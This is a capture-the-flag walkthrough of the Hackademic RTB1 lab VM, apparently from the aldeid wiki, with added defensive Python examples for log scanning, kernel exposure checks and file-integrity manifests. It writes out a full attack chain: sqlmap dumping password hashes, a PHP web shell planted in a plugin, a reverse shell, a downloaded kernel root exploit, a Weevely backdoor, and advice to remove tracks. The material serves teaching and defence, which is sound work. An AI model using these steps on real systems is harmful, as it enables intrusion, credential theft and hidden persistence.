Hackademic-RTB1

From aldeid

Introduction

Description

Hackademic RTB1 is a realistic hacking challenge based on a deliberately vulnerable virtual machine running a web service (WordPress). You will learn how to exploit a SQL injection, escalate privileges, remove your tracks and maintain your access.

Installation

Hackademic RTB1 is a virtual machine that you can download here: https://rapidshare.com/files/3944826991/Hackademic.RTB1.zip. Once downloaded, check the MD5 sum:

$ md5sum Hackademic.RTB1.zip
c972e899a8b5a745963bef78fbcaec6f  Hackademic.RTB1.zip

Unzip the archive and import Hackademic.RTB1.vmx in VMware.

The network interface is NATed and should automatically obtain an IP address from your DHCP server.

Environment

  • The virtual machine (target) is running a Fedora-based Linux distribution and will have the NATed IP address 192.168.1.30.
  • Our attacker's machine will have the IP address 192.168.1.43.

Challenge

Assessment

Services/Versions

The very first stage is to gather as much information about the target as possible. One common step is to scan the target with Nmap:

[email protected]:~# nmap -sS -A 192.168.1.27

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-19 07:06 CET
Nmap scan report for 192.168.1.27
Host is up (0.00033s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Hackademic.RTB1  
MAC Address: 00:0C:29:BE:0C:F2 (VMware)
Aggressive OS guesses: Linux 2.6.22 - 2.6.36 (98%), Linux 2.6.23 - 2.6.38 (95%), Linux 2.6.31 - 2.6.35 (95%), Linux 2.6.9 - 2.6.27 (95%), Linux 2.6.39 (94%), Linux 2.6.22 (93%), Linux 2.6.20 (93%), Linux 2.6.20 (Ubuntu, x86_64) (93%), Linux 2.6.24 - 2.6.36 (93%), Linux 2.6.31 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms 192.168.1.27

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.62 seconds

We now know that the target is running a web service on port 80/tcp and that an SSH service seems to be installed on port 22/tcp, but that service isn't started.

Web service

The web service is hosting a WordPress application (version 1.5.1.1):

Hackademic-001.png

This is a very old version (at the time of this writing, the latest available version of WordPress is 3.3.1).

Find vulnerabilities

With such an outdated version, it's easy to find a bunch of vulnerabilities with Google... :)

However, if you wish, you can use vulnerability scanners like Nikto or W3AF to find SQL injections. Without much effort, you will find a vulnerable parameter "cat" (categories) that will be our entry point:

Hackademic-002.png

Exploit vulnerabilities

Database reverse engineering

Sqlmap is one of the most advanced tools to exploit a SQL injection. We highly suspect that the database is MySQL (--dbms=MySQL). We also provide the URL (-u parameter):

$ ./sqlmap.py -u http://192.168.1.30/Hackademic_RTB1/?cat=oops --dbms=MySQL
[...]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace
    Payload: cat=(SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x3a6664743a,(SELECT
        (CASE WHEN (3964=3964) THEN 1 ELSE 0 END)),0x3a756a693a,FLOOR(RAND(0)*2)
        )x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

[17:09:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
[17:09:05] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1 times
[17:09:05] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.30'

Sqlmap confirms the SQL injection. We are now going to list the databases:

$ ./sqlmap.py -u http://192.168.1.30/Hackademic_RTB1/?cat=oops --dbms=MySQL --dbs
[...]
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress

We immediately notice the presence of the wordpress database. The objective is to find the users table. Let's first list the tables this database contains:

$ ./sqlmap.py -u http://192.168.1.30/Hackademic_RTB1/?cat=oops --dbms=MySQL \
    -D wordpress --tables
[...]
Database: wordpress
[9 tables]
+-------------------+
| wp_categories     |
| wp_comments       |
| wp_linkcategories |
| wp_links          |
| wp_options        |
| wp_post2cat       |
| wp_postmeta       |
| wp_posts          |
| wp_users          |
+-------------------+

The table we are interested in is wp_users. Let's look at its structure so that we gather only the login/password combinations:

$ ./sqlmap.py -u http://192.168.1.30/Hackademic_RTB1/?cat=oops --dbms=MySQL \
   -D wordpress -T wp_users --columns
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_aim            | varchar(50)         |
| user_browser        | varchar(200)        |
| user_description    | longtext            |
| user_domain         | varchar(200)        |
| user_email          | varchar(100)        |
| user_firstname      | varchar(50)         |
| user_icq            | int(10) unsigned    |
| user_idmode         | varchar(20)         |
| user_ip             | varchar(15)         |
| user_lastname       | varchar(50)         |
| user_level          | int(2) unsigned     |
| user_login          | varchar(60)         |
| user_msn            | varchar(100)        |
| user_nicename       | varchar(50)         |
| user_nickname       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
| user_yim            | varchar(50)         |
+---------------------+---------------------+

Let's dump the content of this table for only these 2 columns: user_login and user_pass:

# ./sqlmap.py -u http://192.168.1.30/Hackademic_RTB1/?cat=oops --dbms=MySQL \
   -D wordpress -T wp_users --dump -C user_login,user_pass
+--------------+----------------------------------+
| user_login   | user_pass                        |
+--------------+----------------------------------+
| NickJames    | 21232f297a57a5a743894a0e4a801fc3 |
| MaxBucky     | 50484c19f1afdaf3841a0d821ed393d2 |
| GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 |
| JasonKonnors | 8601f6e1028a8e8a966f6c33fcd9aec4 |
| TonyBlack    | a6e514f9486b83cb53d8d932f9a04292 |
| JohnSmith    | b986448f0bb9e5e124ca91d3d650f52c |
+--------------+----------------------------------+
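
Seen from the web server's side, every request in this section carries a "cat" value that is not a numeric category ID. The following added example (not part of the original walkthrough) scans Apache access-log lines for such values. The log lines are constructed, and the function names and SQL marker list are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration (not captured from the VM).
# The third line is an abbreviated form of the error-based payload shown above.
SAMPLE_LOG = """\
192.168.1.43 - - [19/Mar/2012:17:08:58 +0100] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5120
192.168.1.43 - - [19/Mar/2012:17:09:01 +0100] "GET /Hackademic_RTB1/?cat=oops HTTP/1.1" 200 4011
192.168.1.43 - - [19/Mar/2012:17:09:05 +0100] "GET /Hackademic_RTB1/?cat=%28SELECT%203964%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6664743a%29%29 HTTP/1.1" 500 312
192.168.1.50 - - [19/Mar/2012:17:10:12 +0100] "GET /Hackademic_RTB1/?p=9 HTTP/1.1" 200 6230
"""

# client IP, request target and status code of a common/combined log line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')
# Hypothetical marker list; tune it to your own traffic.
SQL_MARKERS = re.compile(
    r"\b(select|union|concat|information_schema|sleep|benchmark)\b|0x[0-9a-f]{4,}",
    re.IGNORECASE,
)

def classify_cat(value):
    """Return None for a plain numeric category ID, else a reason string."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    if SQL_MARKERS.search(value):
        return "sql-syntax"
    return "non-numeric"

def scan(log_text):
    """Return (client_ip, http_status, reason) for every suspicious cat value."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        # parse_qs also undoes the percent-encoding of the parameter value
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in params.get("cat", []):
            reason = classify_cat(value)
            if reason:
                findings.append((ip, status, reason))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same numeric-only rule is the fix on the application side: a "cat" value that is cast to an integer before it reaches the query cannot carry SQL syntax.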

Crack hashes

Let's try to crack the hashes with http://www.onlinehashcrack.com/

login          reversed password
NickJames      not found
MaxBucky       kernel
GeorgeMiller   q1w2e3
JasonKonnors   maxwell
TonyBlack      not found
JohnSmith      not found

Privilege escalation

Access the admin panel of WordPress

Let's try some of the accounts against the admin panel of WordPress: http://192.168.1.30/Hackademic_RTB1/wp-login.php.

Notice that only GeorgeMiller is a full admin. We will use his account.

Modify a plugin to create a PHP based shell

WordPress lets administrators edit plugin files online, and our account has the privileges to do so. We will replace a plugin's PHP code with a PHP shell.

Hackademic-003.png

First download a PHP shell (e.g. http://itsecteam.com/files/itsecteam_shell_2.1.rar) and replace the code of one of the plugins (e.g. http://192.168.1.30/Hackademic_RTB1/wp-admin/plugin-editor.php?file=hello.php&a=te) with the PHP shell (itsecteam_shell.php). Then click on the "Update File" button.

Once done, you should be able to access the PHP shell: http://192.168.1.27/Hackademic_RTB1/wp-content/plugins/hello.php.

Hackademic-004.png

Use a reverse shell

One of the cool features shipped with this PHP shell is the reverse shell. It opens a connection on a given port from the victim's machine back to the attacker's machine.

From your BackTrack distribution, open a socket on port 5555/tcp with netcat:

# nc -lvvp 5555

From the PHP shell interface, click on "Back Connect" from the top menu and fill in the "Back Connect" fields as follows:

  • IP address: 192.168.1.43 (attacker)
  • port: 5555 (you can leave this value)

Then click on the "Connect" button.

Every command that we enter in our BackTrack terminal is now executed on the target machine, and we get the output back. Let's try some commands:

[email protected]:/pentest/database/sqlmap# nc -lvvp 5555
listening on [any] 5555 ...
192.168.1.30: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.43] from (UNKNOWN) [192.168.1.30] 44009
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
php --version
PHP 5.3.3 (cli) (built: Jul 22 2010 16:20:45) 
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies

Kernel exploit to become root

Assessment

At this stage, we have a session on the target but, as you can see with the "id" command, every command is executed as the "apache" user, who has no root privileges.

We have to find an exploit that will elevate our privileges and enable us to become root.

Here is the information we have about our target:

            installed version         latest available version*
OS          Fedora 12                 Fedora 16
kernel      2.6.31.5-127.fc12.i686    3.3.1
PHP         5.3.3                     5.3.10 / 5.4.0
WordPress   1.5.1.1                   3.3.1

(*) latest stable available version at the time of this writing.

The more outdated a version is, the better our chances of finding an exploit. The OS, and hence the kernel, is quite outdated. Let's try to find an exploit that will work for this version. Terms to search for are "privilege escalation 2.6.31.5".

Find the appropriate exploit

Exploits can be found on these resources:

After some research, we find an exploit that works: http://downloads.securityfocus.com/vulnerabilities/exploits/44219.c

/* 
 * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg <[email protected]>
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */
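
The closing remark of that comment names the hardening step: do not let the RDS packet family load unless it is needed. The following added example (not from the original page or from the exploit's author) checks a host for that condition from three text inputs: the kernel release, the contents of /proc/modules and the modprobe configuration. The version range comes from the exploit's own header and banner; the three accepted modprobe directives and all function names are assumptions, and because distribution kernels backport fixes the version test is only a heuristic.

```python
import re

def in_affected_range(release):
    """True if the upstream version lies within 2.6.30 .. 2.6.36-rc8."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:-rc(\d+))?", release)
    if not m:
        return False
    ver = tuple(int(x) for x in m.group(1, 2, 3))
    if ver == (2, 6, 36):
        # only release candidates up to rc8 are listed as affected
        return m.group(4) is not None and int(m.group(4)) <= 8
    return (2, 6, 30) <= ver < (2, 6, 36)

def rds_autoload_blocked(modprobe_conf):
    """True if the modprobe configuration prevents on-demand loading of rds."""
    for raw in modprobe_conf.splitlines():
        words = raw.split("#", 1)[0].split()   # drop comments, then tokenize
        if words[:2] == ["blacklist", "rds"]:
            return True
        if words[:2] == ["install", "rds"] and words[2:3] in (["/bin/true"], ["/bin/false"]):
            return True
        if words == ["alias", "net-pf-21", "off"]:   # 21 is the RDS address family
            return True
    return False

def assess(release, proc_modules, modprobe_conf):
    """Classify a host from its kernel release, /proc/modules and modprobe.d text."""
    if not in_affected_range(release):
        return "outside affected version range"
    loaded = any(line.split()[:1] == ["rds"] for line in proc_modules.splitlines())
    if loaded:
        return "exposed: rds already loaded"
    if rds_autoload_blocked(modprobe_conf):
        return "mitigated: autoload blocked"
    return "exposed: rds can autoload"

if __name__ == "__main__":
    # Release string as printed by "uname -a" earlier on this page;
    # the module list and configuration are constructed.
    print(assess("2.6.31.5-127.fc12.i686", "ext4 301234 2 - Live\n", ""))
    print(assess("2.6.31.5-127.fc12.i686", "", "install rds /bin/true\n"))
```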

Download the exploit

Still from our BackTrack distro (via the reverse shell), download the exploit:

wget http://downloads.securityfocus.com/vulnerabilities/exploits/44219.c
--2012-04-02 16:48:16--  http://downloads.securityfocus.com/vulnerabilities/exploits/44219.c
Resolving downloads.securityfocus.com... 143.127.139.111
Connecting to downloads.securityfocus.com|143.127.139.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6804 (6.6K) [text/plain]
Saving to: `44219.c'

     0K ......                                                100% 33.5K=0.2s

2012-04-02 16:48:17 (33.5 KB/s) - `44219.c' saved [6804/6804]

Compile the exploit

Then run the following command to compile the exploit:

gcc -o x 44219.c

Run the exploit

To run the exploit, just issue:

./x
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...

Once done, check that you're now root:

id
uid=0(root) gid=0(root)

It works!

Maintain access

Generate the backdoor

The next stage is to maintain our access to the server. We are going to use Weevely. We must first generate the backdoor:

[email protected]:/pentest/backdoors/web/weevely# ./weevely.py generate "SBKJ3Hdkjhbnn" plugins.php
Weevely 0.5.1 - Generate and manage stealth PHP backdoors
              Emilio Pinna 2011-2012            

+ Backdoor file 'plugins.php' created with password 'SBKJ3Hdkjhbnn'.

where:

  • SBKJ3Hdkjhbnn: in order to prevent anyone from using our backdoor, we protect its access with a password
  • plugins.php is the name of the backdoor we have created.

Transfer the backdoor to the server

From the PHP shell, click on "File Manager" from the top menu and either use the upload feature to upload the PHP backdoor or create a file named plugins.php and edit the content:

Hackademic-005.png

Test the backdoor

[email protected]:/pentest/backdoors/web/weevely# ./weevely.py http://192.168.1.30/Hackademic_RTB1/wp-content/plugins/plugins.php "SBKJ3Hdkjhbnn" 

Weevely 0.5.1 - Generate and manage stealth PHP backdoors
              Emilio Pinna 2011-2012            

[+] Starting terminal. Shell probe may take a while...
[shell.php] Loaded using 'Cookie' encapsulation
[shell.sh] Loaded using method 'system'

[shell.sh] Show help with :help command
[shell.sh] Run modules with :<module> <arg 1> ... <arg N>

[email protected]:/var/www/html/Hackademic_RTB1/wp-content/plugins$ id
uid=48(apache) gid=489(apache) groups=489(apache)
[email protected]:/var/www/html/Hackademic_RTB1/wp-content/plugins$ ifconfig
eth1      Link encap:Ethernet  HWaddr 00:0C:29:BE:0C:F2  
          inet addr:192.168.1.30  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: 2a01:e35:8b15:3430:20c:29ff:febe:cf2/64 Scope:Global
          inet6 addr: fe80::20c:29ff:febe:cf2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:15751 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12040 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2311425 (2.2 MiB)  TX bytes:5605020 (5.3 MiB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:240 (240.0 b)  TX bytes:240 (240.0 b)
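
Both changes made to the plugins directory in this walkthrough, the rewritten hello.php and the new plugins.php, show up in a comparison against a known-good manifest of file hashes. The following added example (not part of the original page) builds such a manifest and reports the differences. The directory is a temporary one, and its file contents and the name other.php are constructed placeholders.

```python
import hashlib
import os
import tempfile

def snapshot(directory):
    """Map each file path (relative to directory) to its SHA-256 digest."""
    digests = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            digests[os.path.relpath(path, directory)] = digest
    return digests

def diff(baseline, current):
    """Compare two snapshots and list modified, added and removed files."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }

def demo():
    """Replay the two plugin-directory changes against a constructed directory."""
    with tempfile.TemporaryDirectory() as plugins:
        def write(name, data):
            with open(os.path.join(plugins, name), "wb") as fh:
                fh.write(data)

        # Known-good state (constructed stand-ins for the shipped plugins).
        write("hello.php", b"<?php /* original plugin code */ ?>")
        write("other.php", b"<?php /* another plugin */ ?>")
        baseline = snapshot(plugins)

        # The two changes described on this page, with placeholder content.
        write("hello.php", b"<?php /* replaced through the plugin editor */ ?>")
        write("plugins.php", b"<?php /* file that was not shipped */ ?>")
        return diff(baseline, snapshot(plugins))

if __name__ == "__main__":
    print(demo())
```

The manifest only helps if it is stored off the web server, since an account that can rewrite plugins can rewrite a local baseline too.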

Remove tracks

Do not forget this important part: remove your tracks. Now that you're root on the machine, it shouldn't be difficult ;-) Also remember to restore the WordPress plugin that you modified to create your PHP shell.
